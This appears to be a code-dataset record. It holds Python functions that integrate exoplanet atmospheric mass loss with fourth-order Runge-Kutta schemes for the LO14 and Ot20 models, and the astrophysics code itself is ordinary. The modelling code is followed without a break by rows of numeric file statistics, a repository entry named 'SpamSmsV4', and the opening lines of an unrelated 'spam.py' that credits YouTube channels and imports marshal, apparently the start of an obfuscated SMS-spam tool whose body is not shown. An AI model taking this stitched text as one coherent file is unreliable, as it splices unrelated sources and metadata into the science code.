            k1 = (dt * Myr_to_sec * Mdot1) / M_EARTH
            M_05k1 = M + 0.5 * k1  # mass after 1st RK step
            M_env_05k1 = M_05k1 - M_core
            f_env_05k1 = (M_env_05k1 / M_05k1) * 100  # new env. mass frac.
            if (i == 1) and (j == 1) and (M_05k1 < M_core):
                # still in the first RK iteration, and the initial step
                # size was likely too large -> set step size to minimum
                dt = min_step_size
                j += 1
                break

            Mdot2 = mass_loss_rate_forward_LO14(t + 0.5*dt, epsilon, K_on,
                                                beta_on, planet_object,
                                                f_env_05k1, track_dict)
            k2 = (dt * Myr_to_sec * Mdot2) / M_EARTH
            M_05k2 = M + 0.5 * k2
            M_env_05k2 = M_05k2 - M_core
            f_env_05k2 = (M_env_05k2 / M_05k2) * 100
            if (i == 1) and (j == 1) and (M_05k2 < M_core):
                dt = min_step_size
                j += 1
                break

            Mdot3 = mass_loss_rate_forward_LO14(t + 0.5*dt, epsilon, K_on,
                                                beta_on, planet_object,
                                                f_env_05k2, track_dict)
            k3 = (dt * Myr_to_sec * Mdot3) / M_EARTH
            M_k3 = M + k3
            M_env_k3 = M_k3 - M_core
            f_env_k3 = (M_env_k3 / M_k3) * 100
            if (i == 1) and (j == 1) and (M_k3 < M_core):
                dt = min_step_size
                j += 1
                break

            Mdot4 = mass_loss_rate_forward_LO14(t + dt, epsilon, K_on,
                                                beta_on, planet_object,
                                                f_env_k3, track_dict)
            k4 = (dt * Myr_to_sec * Mdot4) / M_EARTH
            # total mass lost after time-step dt
            M_lost = (k1 + 2*k2 + 2*k3 + k4) / 6.
            # next value of the planet mass
            M_new = M + M_lost
            M_env_new = M_new - M_core

            # now check if the atmosphere is gone, or if the planet is
            # close to complete atmosphere removal
            if (np.isnan(M_lost) or np.iscomplex(M_new)) \
                    and (dt == min_step_size):
                # The planet evaporates within this step and the step size
                # is already at its minimum -> assume the current RK
                # iteration removes all remaining atmosphere; at t_i+dt
                # only the bare rocky core is left (planet mass = core
                # mass, planet radius = core radius). Terminates the run.
                t_evap = t_arr[-1] + dt
                t_arr.append(t_evap)
                M_arr.append(M_core)
                R_arr.append(R_core)
                # BUGFIX: evaluate Lx at the appended time t_evap (the
                # original read t_arr[-1]+dt AFTER appending, sampling
                # Lx at t_evap+dt instead)
                Lx_arr.append(lx_evo(t=t_evap, track_dict=track_dict))
                envelope_left = False  # flag complete envelope removal
                j += 1
                break
            elif (np.isnan(M_lost) or np.iscomplex(M_new)) \
                    and (dt > min_step_size) \
                    and (close_to_evaporation == False):
                # planet close to evaporation, but the step size is not at
                # its minimum yet: set it to the minimum value and run the
                # RK iteration again (until the stopping condition above
                # is fulfilled). close_to_evaporation makes sure the code
                # does not run into an infinite loop near evaporation:
                # once True, the code continues with a fixed minimum step
                # size and is no longer allowed to adjust it.
                dt = min_step_size
                close_to_evaporation = True
                j += 1
                break

            # this part is new compared to the version used in the PAPER
            # (there we used a fixed step size!)
            # if we are still in the loop at this point, calculate the new
            # radius and check how drastic the radius change would be;
            # adjust the step size if too drastic or too little
            f_env_new = (M_env_new/M_new)*100  # in %
            R_new = plmoLoFo14.calculate_planet_radius(
                                        M_core, f_env_new, t,
                                        flux_at_planet_earth(
                                            planet_object.Lbol,
                                            planet_object.distance),
                                        planet_object.metallicity
                                        )

            # only adjust step size if planet is not close to evaporation
            if close_to_evaporation == False:
                # check how much the radius changes: R(t_i) vs R(t_i+dt);
                # if the change is larger than 0.5%, make the step size
                # smaller by a factor 10; if smaller than 0.02%, make it
                # bigger by a factor 10 - but never beyond the min/max
                # step size. If the change is too much/too little, do not
                # record anything; redo the RK iteration with the new dt.
                R_change = abs((R-R_new)/R)*100  # radius change in percent
                if (R_change > 0.5) \
                        and (t < track_dict["t_curr"]) \
                        and (dt > min_step_size):
                    dt = dt / 10.
                    j += 1
                    break
                elif (R_change < 0.02) \
                        and (t < track_dict["t_curr"]) \
                        and (dt < max_step_size):
                    dt = dt * 10.
                    j += 1
                    break
                # NOTE: in principle these hardcoded thresholds could
                # differ between early planet evolution (much happening)
                # and late evolution (almost no change any more)
                elif (R_change > 0.5) \
                        and (t >= track_dict["t_curr"]) \
                        and (dt > min_step_size):
                    dt = dt / 10.
                    j += 1
                    break
                elif (R_change < 0.02) \
                        and (t >= track_dict["t_curr"]) \
                        and (dt < max_step_size):
                    dt = dt * 10.
                    j += 1
                    break
                else:  # radius change is ok
                    # sanity check: is the new planet mass still greater
                    # than the core mass? Then some atmosphere is left;
                    # update params and go into the next RK iteration
                    if ((M + M_lost) - M_core) > 0:
                        M = M + M_lost  # new planet mass (M_lost < 0)
                        t = t_arr[-1] + dt  # updated time value t_i+1
                        M_arr.append(M)
                        t_arr.append(t)
                        Lx_arr.append(lx_evo(t=t, track_dict=track_dict))
                        # new envelope mass fraction:
                        M_env = M - M_core
                        f_env = (M_env/M)*100  # in %
                        # new radius with new planet mass/envelope mass
                        # fraction, one time step later
                        R = plmoLoFo14.calculate_planet_radius(
                                                M_core, f_env, t,
                                                flux_at_planet_earth(
                                                    planet_object.Lbol,
                                                    planet_object.distance),
                                                planet_object.metallicity
                                                )
                        R_arr.append(R)
                        i += 1  # update step to i+1
                        j += 1
                    else:
                        # this should never happen
                        # BUGFIX: was sys.exit(...) with `sys` never
                        # imported, which raised NameError instead
                        raise RuntimeError(
                            "sanity check failed: planet mass dropped "
                            "below core mass")
                    break
            elif close_to_evaporation == True:
                # do not adjust the step size based on the radius change
                if ((M + M_lost) - M_core) > 0:
                    M = M + M_lost  # new planet mass (M_lost < 0)
                    t = t_arr[-1] + dt  # updated time value t_i+1
                    M_arr.append(M)
                    t_arr.append(t)
                    Lx_arr.append(lx_evo(t=t, track_dict=track_dict))
                    # new envelope mass fraction:
                    M_env = M - M_core
                    f_env = (M_env/M)*100  # in %
                    # new radius with new planet mass/envelope mass
                    # fraction, one time step later
                    R = plmoLoFo14.calculate_planet_radius(
                                            M_core, f_env, t,
                                            flux_at_planet_earth(
                                                planet_object.Lbol,
                                                planet_object.distance),
                                            planet_object.metallicity
                                            )
                    R_arr.append(R)
                    i += 1  # update step to i+1
                    j += 1
                else:
                    raise RuntimeError(
                        "sanity check failed: planet mass dropped "
                        "below core mass")
                break

    # either the planet has fully evaporated (bare core appended above) or
    # t_final was reached; in both cases return the traced evolution
    return np.array(t_arr), np.array(M_arr), \
           np.array(R_arr), np.array(Lx_arr)
def mass_planet_RK4_forward_LO14_PAPER(epsilon, K_on, beta_on,
                                       planet_object, initial_step_size,
                                       t_final, track_dict):
    """USED: 4th order Runge-Kutta as numerical integration method.

    Integrate from the current time (t_start, where planet has R0 and M0)
    into the future, accounting for photoevaporative mass loss.
    The step size is FIXED (this is the version used in the paper).

    Parameters:
    -----------
    epsilon (float): evaporation efficiency
    K_on (str): set use of K parameter on or off ("on" or "off)
    beta_on (str): set use of beta parameter on or off ("on" or "off)
    planet_object: object of planet class which contains also stellar
                   parameters and info about stellar evo track
    step_size (float): fixed
    t_final (float): final time of simulation
    track_dict (dict): dictionary with Lx evolutionary track parameters

    Returns:
    --------
    t_arr (array): time array to trace mass and radius evolution
    M_arr (array): mass array with mass evolution over time (mass decrease)
    R_arr (array): radius array with radius evolution over time (from
                   thermal contraction and photoevaporative mass-loss)
    Lx_arr (array): array to trace the X-ray luminosity (mainly for
                    consistency checks)
    """
    EARTH_MASS_G = const.M_earth.cgs.value
    SEC_PER_MYR = 1e6*365*86400

    # starting values: Lx, Lxuv and incident XUV flux at t_start
    lx_start = lx_evo(t=track_dict["t_start"], track_dict=track_dict)
    lxuv_start = l_xuv_all(lx_start)
    fxuv_start = flux_at_planet(lxuv_start, planet_object.distance)

    # initial planet parameters at t_start
    f_env = planet_object.fenv
    radius = planet_object.radius
    mass = planet_object.mass
    mean_density = plmoLoFo14.density_planet(mass, radius)  # informational
    core_mass = planet_object.core_mass
    env_mass = mass - core_mass  # initial envelope mass

    # beta and K at t_start (informational; the mass-loss-rate function
    # evaluates them itself)
    if beta_on == "yes":
        beta = bk.beta_fct(mass, fxuv_start, radius)
    elif beta_on == "no":
        beta = 1.
    if K_on == "yes":
        K = bk.K_fct(planet_object.distance, mass,
                     planet_object.mass_star, radius)
    elif K_on == "no":
        K = 1.

    # build the fixed time grid from the user-specified step size;
    # retstep returns the actual (uniform) spacing of the grid
    t_start = track_dict["t_start"]
    n_points = math.ceil((t_final - t_start) / initial_step_size)
    times, dt = np.linspace(t_start, t_final, n_points,
                            endpoint=True, retstep=True)

    # output lists, seeded with the initial state
    M_arr = [mass]
    R_arr = [radius]
    t_arr = [t_start]
    Lx_arr = [lx_start]

    # STOP criterion: LoFo14 planets have a FIXED core mass and thus a
    # fixed core (bare rock) radius - stop once it is reached
    core_radius = planet_object.core_radius

    for idx in range(len(times) - 1):
        # trace Lx(t) for consistency checks only (the mass-loss-rate
        # function computes Lx internally)
        lx_now = lx_evo(t=t_arr[idx], track_dict=track_dict)

        # classic RK4: four mass-loss-rate evaluations per step,
        # each converted to an Earth-mass increment over dt
        mdot_a = mass_loss_rate_forward_LO14(times[idx], epsilon,
                                             K_on, beta_on, planet_object,
                                             f_env, track_dict)
        k1 = (dt * SEC_PER_MYR * mdot_a) / EARTH_MASS_G
        m_a = mass + 0.5 * k1
        f_a = ((m_a - core_mass) / m_a) * 100

        mdot_b = mass_loss_rate_forward_LO14(times[idx]+0.5*dt, epsilon,
                                             K_on, beta_on, planet_object,
                                             f_a, track_dict)
        k2 = (dt * SEC_PER_MYR * mdot_b) / EARTH_MASS_G
        m_b = mass + 0.5 * k2
        f_b = ((m_b - core_mass) / m_b) * 100

        mdot_c = mass_loss_rate_forward_LO14(times[idx]+0.5*dt, epsilon,
                                             K_on, beta_on, planet_object,
                                             f_b, track_dict)
        k3 = (dt * SEC_PER_MYR * mdot_c) / EARTH_MASS_G
        m_c = mass + k3
        f_c = ((m_c - core_mass) / m_c) * 100

        mdot_d = mass_loss_rate_forward_LO14(times[idx]+dt, epsilon,
                                             K_on, beta_on, planet_object,
                                             f_c, track_dict)
        k4 = (dt * SEC_PER_MYR * mdot_d) / EARTH_MASS_G

        # weighted RK4 combination: mass change over this step
        delta_m = (k1 + 2*k2 + 2*k3 + k4)/6.

        if ((mass + delta_m) - core_mass) > 0:
            # planet still has some atmosphere left -> advance the state
            mass = mass + delta_m
            env_mass = mass - core_mass
            t_next = t_arr[idx] + dt
            f_env = (env_mass/mass)*100  # in %
            # new radius from the new mass / envelope fraction, one time
            # step later
            radius = plmoLoFo14.calculate_planet_radius(
                                    core_mass, f_env, t_next,
                                    flux_at_planet_earth(
                                        planet_object.Lbol,
                                        planet_object.distance),
                                    planet_object.metallicity)
            t_arr.append(t_next)
            M_arr.append(mass)
            R_arr.append(radius)
            Lx_arr.append(lx_evo(t=t_next, track_dict=track_dict))
        else:
            # atmosphere fully stripped -> record the bare core at t_i+1
            # and terminate
            t_arr.append(t_arr[-1]+dt)
            M_arr.append(core_mass)
            R_arr.append(core_radius)
            Lx_arr.append(lx_evo(t=t_arr[-1]+dt, track_dict=track_dict))
            return np.array(t_arr), np.array(M_arr), \
                   np.array(R_arr), np.array(Lx_arr)

    return np.array(t_arr), np.array(M_arr), \
           np.array(R_arr), np.array(Lx_arr)
def mass_planet_RK4_forward_Ot20(epsilon, K_on, beta_on, planet_object,
                                 initial_step_size, t_final, track_dict):
    """USED: 4th order Runge-Kutta as numerical integration method.

    Integrate from the current time (t_start, where the planet has R0 and
    M0) into the future, taking into account photoevaporative mass loss.
    Uses the Ot20 mass-radius relation; the step size is adaptive.

    Parameters:
    -----------
    epsilon (float): evaporation efficiency
    K_on (str): set use of K parameter on or off ("yes" or "no")
    beta_on (str): set use of beta parameter on or off ("yes" or "no")
    planet_object: object of planet class which contains also stellar
                   parameters and info about stellar evo track
    initial_step_size (float): initial step size; varied during the run
    t_final (float): final time of simulation
    track_dict (dict): dictionary with Lx evolutionary track parameters

    [NOTE: the implementation of a variable step size is somewhat
    preliminary. The step size is adjusted (made smaller or bigger
    depending on how fast or slow the mass/radius changes) until the final
    time step is greater than t_final. This means that if the step size in
    the end is e.g. 10 Myr, and the integration is at 4999 Myr, then the
    last time entry will be 4999+10 -> 5009 Myr.]

    Returns:
    --------
    t_arr (array): time array to trace mass and radius evolution
    M_arr (array): mass array with mass evolution over time (mass decrease)
    R_arr (array): radius array with radius evolution over time (from
                   thermal contraction and photoevaporative mass-loss)
    Lx_arr (array): array to trace the X-ray luminosity (mainly for
                    consistency checks)

    Raises:
    -------
    RuntimeError: if the post-step sanity check (planet mass still above
                  core mass) fails; this should never happen.
    """
    M_EARTH = const.M_earth.cgs.value
    Myr_to_sec = 1e6*365*86400
    # initialize the starting values for Lxuv(t_start), mass, density,
    # beta, K
    Lx0 = lx_evo(t=track_dict["t_start"], track_dict=track_dict)
    Lxuv0 = l_xuv_all(Lx0)
    Fxuv0 = flux_at_planet(Lxuv0, planet_object.distance)

    # "make" initial planet at t_start
    R0 = R = planet_object.radius
    M0 = M = planet_object.mass
    rho0 = rho = plmoOt20.density_planet(M0, R0)  # initial approx. density

    # beta0 and K0 are informational only here; the mass-loss-rate
    # function evaluates beta and K itself at each substep
    if beta_on == "yes":
        beta = beta0 = bk.beta_fct(M0, Fxuv0, R0)
    elif beta_on == "no":
        beta = beta0 = 1.
    if K_on == "yes":
        K = K0 = bk.K_fct(planet_object.distance, M0,
                          planet_object.mass_star, R0)
    elif K_on == "no":
        K = K0 = 1.

    M_arr = [M0]
    R_arr = [R0]
    t0 = t = track_dict["t_start"]
    t_arr = [t0]
    Lx_arr = [Lx0]

    # CRITERION for when to stop the mass loss:
    # stop when this hardcoded radius is reached (it is the minimum
    # radius for which the Ot20 volatile regime is valid)
    R_core = 2.15
    M_core = plmoOt20.calculate_mass_planet_Ot20(R_core)

    dt = initial_step_size
    # NOTE: minimum and maximum step size are HARDCODED for now (see
    # further down in code for more details)
    min_step_size, max_step_size = 1e-2, 10.

    i = 1  # counter: how many traced RK iterations have been performed
    j = 1  # counter: how many RK iterations have been attempted
    envelope_left = True  # flag: False once the envelope is gone
    close_to_evaporation = False  # flag: planet is close to complete
                                  # atmospheric removal
    # keep all attempted step sizes, even those which resulted in too
    # drastic radius changes -> used to detect the code oscillating in an
    # infinite loop between make_bigger, make_smaller, make_bigger, etc.
    step_size_list = []

    while t <= t_final:
        # This step (Lx(t) calculation) is just for tracing Lx and
        # checking if it is correct. It is NOT required since the Lx(t)
        # calculation is embedded in the mass-loss-rate function.
        Lx_i = lx_evo(t=t, track_dict=track_dict)

        # IMPORTANT points on the time step:
        # When the initial time step is too large OR the planet mass
        # becomes very close to the core mass (after several time steps),
        # one of the RK substeps can lose so much mass that the new planet
        # mass is smaller than the core mass.
        # Two cases are distinguished:
        # 1) the initial time step is too large, so M_lost = nan after the
        # first iteration (i.e. an RK substep mass < core mass)
        # -> immediately switch to the lowest possible step size and let
        # the code run from there (the step size can grow again later)
        # 2) at the end of planet evolution, when the planet mass gets
        # very close to the core mass, the mass lost eventually exceeds
        # the remaining atmosphere mass (either at the end of a complete
        # RK iteration, or already in one of the RK substeps, in which
        # case the mass lost after the complete RK step evaluates to nan
        # and no new planet radius can be calculated). In both cases the
        # planet is assumed to be fully evaporated at t_i + dt.

        # record the current step size, then check the last 20 attempts
        # for a constant back-and-forth between two step sizes,
        # e.g. [0.1, 1.0, 0.1, 1.0, ...]: differences all equal, values
        # not all the same, and the even/odd positions each constant
        step_size_list.append(dt)
        step_size_array = np.array(step_size_list)
        step_size_difference = abs(np.diff(step_size_array[-20:]))
        if len(step_size_array) >= 20:  # check only after 20 iterations
            if (np.all(step_size_difference == step_size_difference[0]) and
                    not np.all(step_size_array == step_size_array[0]) and
                    np.all(step_size_array[::2] == step_size_array[0]) and
                    np.all(step_size_array[1::2] == step_size_array[1])):
                print("no convergence, set min. step size.")
                # no convergence -> switch to minimum step size
                dt = min_step_size
        # else, all is good, continue with current step size

        while envelope_left:
            # go through RK iterations as long as there is envelope left;
            # apply Runge-Kutta 4th order to find the next value of M_dot
            # NOTE: the mass lost in one timestep is in Earth masses
            Mdot1 = mass_loss_rate_forward_Ot20(t, epsilon,
                                                K_on, beta_on,
                                                planet_object, R,
                                                track_dict)
            k1 = (dt * Myr_to_sec * Mdot1) / M_EARTH
            # mass & radius after the 1st (half) RK substep
            # (renamed from M_k1/R_k1 for consistency with the LO14
            # version: "05" marks half-step quantities)
            M_05k1 = M + 0.5 * k1
            R_05k1 = plmoOt20.calculate_radius_planet_Ot20(M_05k1)
            if (i == 1) and (j == 1) and (M_05k1 < M_core):
                # still in the first RK iteration, and the initial step
                # size was likely too large -> set step size to minimum
                dt = min_step_size
                j += 1
                break

            Mdot2 = mass_loss_rate_forward_Ot20(t + 0.5*dt, epsilon,
                                                K_on, beta_on,
                                                planet_object, R_05k1,
                                                track_dict)
            k2 = (dt * Myr_to_sec * Mdot2) / M_EARTH
            M_05k2 = M + 0.5 * k2
            R_05k2 = plmoOt20.calculate_radius_planet_Ot20(M_05k2)
            if (i == 1) and (j == 1) and (M_05k2 < M_core):
                dt = min_step_size
                j += 1
                break

            Mdot3 = mass_loss_rate_forward_Ot20(t + 0.5*dt, epsilon,
                                                K_on, beta_on,
                                                planet_object, R_05k2,
                                                track_dict)
            k3 = (dt * Myr_to_sec * Mdot3) / M_EARTH
            M_k3 = M + k3
            R_k3 = plmoOt20.calculate_radius_planet_Ot20(M_k3)
            if (i == 1) and (j == 1) and (M_k3 < M_core):
                dt = min_step_size
                j += 1
                break

            Mdot4 = mass_loss_rate_forward_Ot20(t + dt, epsilon,
                                                K_on, beta_on,
                                                planet_object, R_k3,
                                                track_dict)
            k4 = (dt * Myr_to_sec * Mdot4) / M_EARTH
            # total mass lost after time-step dt
            M_lost = (k1 + 2*k2 + 2*k3 + k4) / 6.
            # next value of the planet mass
            M_new = M + M_lost

            # now check if the atmosphere is gone, or if the planet is
            # close to complete atmosphere removal
            if (np.isnan(M_lost) or np.iscomplex(M_new)) \
                    and (dt == min_step_size):
                # The planet evaporates within this step and the step size
                # is already at its minimum -> assume the current RK
                # iteration removes all remaining atmosphere; at t_i+dt
                # only the bare rocky core is left (planet mass = core
                # mass, planet radius = core radius). Terminates the run.
                t_evap = t_arr[-1] + dt
                t_arr.append(t_evap)
                M_arr.append(M_core)
                R_arr.append(R_core)
                # BUGFIX: evaluate Lx at the appended time t_evap (the
                # original read t_arr[-1]+dt AFTER appending, sampling
                # Lx at t_evap+dt instead)
                Lx_arr.append(lx_evo(t=t_evap, track_dict=track_dict))
                envelope_left = False  # flag complete envelope removal
                j += 1
                break
            elif (np.isnan(M_lost) or np.iscomplex(M_new)) \
                    and (dt > min_step_size) \
                    and (close_to_evaporation == False):
                # planet close to evaporation, but the step size is not at
                # its minimum yet: set it to the minimum value and run the
                # RK iteration again (until the stopping condition above
                # is fulfilled). close_to_evaporation makes sure the code
                # does not run into an infinite loop near evaporation:
                # once True, the code continues with a fixed minimum step
                # size and is no longer allowed to adjust it.
                dt = min_step_size
                close_to_evaporation = True
                j += 1
                break

            # this part is new compared to the version used in the PAPER
            # (there we used a fixed step size!)
            # if we are still in the loop at this point, calculate the new
            # radius and check how drastic the radius change would be;
            # adjust the step size if too drastic or too little
            R_new = plmoOt20.calculate_radius_planet_Ot20(M_new)

            # only adjust step size if planet is not close to evaporation
            if close_to_evaporation == False:
                # check how much the radius changes: R(t_i) vs R(t_i+dt);
                # if the change is larger than 1%, make the step size
                # smaller by a factor 10; if smaller than 0.01%, make it
                # bigger by a factor 10 - but never beyond the min/max
                # step size. If the change is too much/too little, do not
                # record anything; redo the RK iteration with the new dt.
                R_change = abs((R-R_new)/R)*100  # radius change in percent
                if (R_change > 1.) \
                        and (t < track_dict["t_curr"]) \
                        and (dt > min_step_size):
                    dt = dt / 10.
                    j += 1
                    break
                elif (R_change < 0.01) \
                        and (t < track_dict["t_curr"]) \
                        and (dt < max_step_size):
                    dt = dt * 10.
                    j += 1
                    break
                # NOTE: in principle these hardcoded thresholds could
                # differ between early planet evolution (much happening)
                # and late evolution (almost no change any more)
                elif (R_change > 1.) \
                        and (t >= track_dict["t_curr"]) \
                        and (dt > min_step_size):
                    dt = dt / 10.
                    j += 1
                    break
                elif (R_change < 0.01) \
                        and (t >= track_dict["t_curr"]) \
                        and (dt < max_step_size):
                    dt = dt * 10.
                    j += 1
                    break
                else:  # radius change is ok
                    # sanity check: is the new planet mass still greater
                    # than the core mass? Then some atmosphere is left;
                    # update params and go into the next RK iteration
                    if ((M + M_lost) - M_core) > 0:
                        M = M + M_lost  # new planet mass (M_lost < 0)
                        t = t_arr[-1] + dt  # updated time value t_i+1
                        M_arr.append(M)
                        t_arr.append(t)
                        Lx_arr.append(lx_evo(t=t, track_dict=track_dict))
                        # new envelope mass fraction (informational for
                        # Ot20 - the radius follows from the mass):
                        M_env = M - M_core
                        f_env = (M_env/M)*100  # in %
                        # new radius from the new planet mass, one time
                        # step later
                        R = plmoOt20.calculate_radius_planet_Ot20(M)
                        R_arr.append(R)
                        i += 1  # update step to i+1
                        j += 1
                    else:
                        # this should never happen
                        # BUGFIX: was sys.exit(...) with `sys` never
                        # imported, which raised NameError instead
                        raise RuntimeError(
                            "sanity check failed: planet mass dropped "
                            "below core mass")
                    break
            elif close_to_evaporation == True:
                # do not adjust the step size based on the radius change
                if ((M + M_lost) - M_core) > 0:
                    M = M + M_lost  # new planet mass (M_lost < 0)
                    t = t_arr[-1] + dt  # updated time value t_i+1
                    M_arr.append(M)
                    t_arr.append(t)
                    Lx_arr.append(lx_evo(t=t, track_dict=track_dict))
                    # new envelope mass fraction (informational for Ot20):
                    M_env = M - M_core
                    f_env = (M_env/M)*100  # in %
                    # new radius from the new planet mass, one time step
                    # later
                    R = plmoOt20.calculate_radius_planet_Ot20(M)
                    R_arr.append(R)
                    i += 1  # update step to i+1
                    j += 1
                else:
                    raise RuntimeError(
                        "sanity check failed: planet mass dropped "
                        "below core mass")
                break

    # either the planet has fully evaporated (bare core appended above) or
    # t_final was reached; in both cases return the traced evolution
    return np.array(t_arr), np.array(M_arr), \
           np.array(R_arr), np.array(Lx_arr)
def mass_planet_RK4_forward_Ot20_PAPER(epsilon, K_on, beta_on,
                                       planet_object, initial_step_size,
                                       t_final, track_dict):
    """Integrate planetary mass loss forward in time with a fixed step.

    USED: 4th-order Runge-Kutta as the numerical integration method.
    Integrate from the current time t_start (where the planet has R0 and
    M0) into the future, taking photoevaporative mass loss into account.

    Parameters
    ----------
    epsilon : float
        Evaporation efficiency.
    K_on : str
        "yes"/"no" -- switch the K parameter on or off.
    beta_on : str
        "yes"/"no" -- switch the beta parameter on or off.
    planet_object : object
        Planet-class object; also carries stellar parameters and info
        about the stellar evolutionary track.
    initial_step_size : float
        Initial (fixed) step size in Myr.
    t_final : float
        Final time of the simulation in Myr.
    track_dict : dict
        Dictionary with Lx evolutionary-track parameters.

    Returns
    -------
    t_arr, M_arr, R_arr, Lx_arr : np.ndarray
        Time, mass, radius and Lx values from t_start to t_final (or up
        to the step where the atmosphere is completely lost).
    """
    M_EARTH = const.M_earth.cgs.value
    Myr_to_sec = 1e6 * 365 * 86400

    # initialize the starting values for Lxuv(t_start), mass, density,
    # beta and K
    Lx0 = lx_evo(t=track_dict["t_start"], track_dict=track_dict)
    Lxuv0 = l_xuv_all(Lx0)
    Fxuv0 = flux_at_planet(Lxuv0, planet_object.distance)

    # "make" the initial planet at t_start
    R0 = R = planet_object.radius
    M0 = M = planet_object.mass
    rho0 = rho = plmoOt20.density_planet(M0, R0)  # initial approx. density

    # specify beta0 and K0 (bookkeeping only: the mass-loss-rate call
    # below receives the K_on/beta_on switches directly)
    if beta_on == "yes":
        beta = beta0 = bk.beta_fct(M0, Fxuv0, R0)
    elif beta_on == "no":
        beta = beta0 = 1.
    if K_on == "yes":
        K = K0 = bk.K_fct(planet_object.distance, M0,
                          planet_object.mass_star, R0)
    elif K_on == "no":
        K = K0 = 1.

    # create the time array for integration (user-specified step size);
    # retstep returns the actually-realized step after rounding `number`
    t_start, t_max = track_dict["t_start"], t_final
    step_size = initial_step_size
    number = math.ceil((t_max - t_start) / step_size)
    times, step_size2 = np.linspace(t_start, t_max, number,
                                    endpoint=True, retstep=True)
    dt = step_size2

    # lists of all the values we want to track & output in the end
    M_arr = [M0]
    R_arr = [R0]
    t_arr = [t_start]
    Lx_arr = [Lx0]

    # CRITERION for when to stop the mass loss: R_core is the minimum
    # radius for which the volatile regime is valid
    R_core = 2.15
    M_core = plmoOt20.calculate_mass_planet_Ot20(R_core)

    for i in range(0, len(times) - 1):
        # kept only as a sanity check of the Lx(t) evolution (the Lx(t)
        # calculation is embedded in the mass-loss-rate function)
        Lx_i = lx_evo(t=t_arr[i], track_dict=track_dict)

        # classical RK4 stages for dM/dt
        Mdot1 = mass_loss_rate_forward_Ot20(times[i], epsilon,
                                            K_on, beta_on,
                                            planet_object, R,
                                            track_dict)
        k1 = (dt * Myr_to_sec * Mdot1) / M_EARTH  # in Earth masses
        M_05k1 = M + 0.5 * k1
        R_05k1 = plmoOt20.calculate_radius_planet_Ot20(M_05k1)
        Mdot2 = mass_loss_rate_forward_Ot20(times[i] + 0.5 * dt, epsilon,
                                            K_on, beta_on,
                                            planet_object, R_05k1,
                                            track_dict)
        k2 = (dt * Myr_to_sec * Mdot2) / M_EARTH
        M_05k2 = M + 0.5 * k2
        R_05k2 = plmoOt20.calculate_radius_planet_Ot20(M_05k2)
        Mdot3 = mass_loss_rate_forward_Ot20(times[i] + 0.5 * dt, epsilon,
                                            K_on, beta_on,
                                            planet_object, R_05k2,
                                            track_dict)
        k3 = (dt * Myr_to_sec * Mdot3) / M_EARTH
        # BUGFIX: the 4th RK stage must be evaluated at the FULL step,
        # M + k3 (the original code used M + 0.5*k3, i.e. the half step,
        # which is not classical RK4)
        M_k3 = M + k3
        R_k3 = plmoOt20.calculate_radius_planet_Ot20(M_k3)
        Mdot4 = mass_loss_rate_forward_Ot20(times[i] + dt, epsilon,
                                            K_on, beta_on,
                                            planet_object, R_k3,
                                            track_dict)
        k4 = (dt * Myr_to_sec * Mdot4) / M_EARTH
        # mass lost over this time step dt (negative for mass loss)
        M_lost = (k1 + 2 * k2 + 2 * k3 + k4) / 6.

        # check whether the planet with its new mass still has an
        # atmosphere (i.e. mass above the bare core mass)
        if ((M + M_lost) - M_core) > 0:
            # planet still has some atmosphere left -> continue
            M = M + M_lost  # new planet mass (M_lost is negative)
            t = t_arr[-1] + dt  # t_i_plus_1 - updated time value
            # calculate the new radius from the new planet mass
            R = plmoOt20.calculate_radius_planet_Ot20(M)
            M_arr.append(M)
            R_arr.append(R)
            t_arr.append(t)
            Lx_arr.append(lx_evo(t=t, track_dict=track_dict))
        else:
            # all atmosphere is gone (criterion set at the top):
            # append the bare-core mass and radius at t_i+1 and stop
            t_arr.append(t_arr[-1] + dt)
            M_arr.append(M_core)
            R_arr.append(R_core)
            Lx_arr.append(lx_evo(t=t_arr[-1] + dt, track_dict=track_dict))
            return np.array(t_arr), np.array(M_arr), \
                   np.array(R_arr), np.array(Lx_arr)

    # planet survived until t_final: output the final arrays
    return np.array(t_arr), np.array(M_arr), \
           np.array(R_arr), np.array(Lx_arr)
| 45.520226
| 80
| 0.548173
| 6,641
| 48,388
| 3.815239
| 0.073332
| 0.040731
| 0.012156
| 0.011051
| 0.956901
| 0.94885
| 0.934799
| 0.918814
| 0.910408
| 0.900028
| 0
| 0.029559
| 0.379144
| 48,388
| 1,062
| 81
| 45.563089
| 0.813827
| 0.414318
| 0
| 0.892532
| 0
| 0
| 0.01223
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007286
| false
| 0
| 0.020036
| 0
| 0.041894
| 0.003643
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
85a138309a7814fc3442b47f214687488c222bd7
| 21,082
|
py
|
Python
|
spam.py
|
4NK3R-PRODUCT1ON/SpamSmsV4
|
c16a66f52574665c24c6ff3b6f309b42f0d79b4c
|
[
"Apache-2.0"
] | 1
|
2021-03-08T15:06:46.000Z
|
2021-03-08T15:06:46.000Z
|
spam.py
|
4NK3R-PRODUCT1ON/SpamSmsV4
|
c16a66f52574665c24c6ff3b6f309b42f0d79b4c
|
[
"Apache-2.0"
] | null | null | null |
spam.py
|
4NK3R-PRODUCT1ON/SpamSmsV4
|
c16a66f52574665c24c6ff3b6f309b42f0d79b4c
|
[
"Apache-2.0"
] | null | null | null |
# Compile By Anker
# Youtube : FaaL TV
# Youtube : Anker Production
import marshal
